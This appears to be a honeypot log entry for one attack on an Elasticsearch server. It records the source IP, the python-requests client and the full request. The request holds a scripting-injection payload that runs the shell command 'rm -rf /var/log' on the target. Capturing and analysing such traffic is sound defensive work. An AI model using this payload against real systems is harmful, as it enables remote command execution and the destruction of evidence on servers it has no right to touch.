Attack f65ab280-3eed-4cbc-975d-83e83dd7ed47
Details
| ID |
f65ab280-3eed-4cbc-975d-83e83dd7ed47 |
| Attack Type |
elasticsearch |
| IP Address |
43.249.192.59 |
| Username |
|
| Password |
|
| Client Version |
python-requests/2.4.1 CPython/2.7.8 Windows/2003Server |
| Country |
China |
| Date |
2019-07-11 07:43AM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Accept": "*/*",
"Connection": "keep-alive",
"User-Agent": "python-requests/2.4.1 CPython/2.7.8 Windows/2003Server",
"Accept-Encoding": "gzip, deflate"
},
"hostname": "45.32.57.42:9200",
"form_data": {
"source": "{\"query\": {\"filtered\": {\"query\": {\"match_all\": {}}}}, \"script_fields\": {\"exp\": {\"script\": \"import java.util.*;import java.io.*;String str = \\\"\\\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\\\"rm -rf /var/log\\\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\\\"\\r\\n\\\");}sb.toString();\"}}, \"size\": 1}"
}
}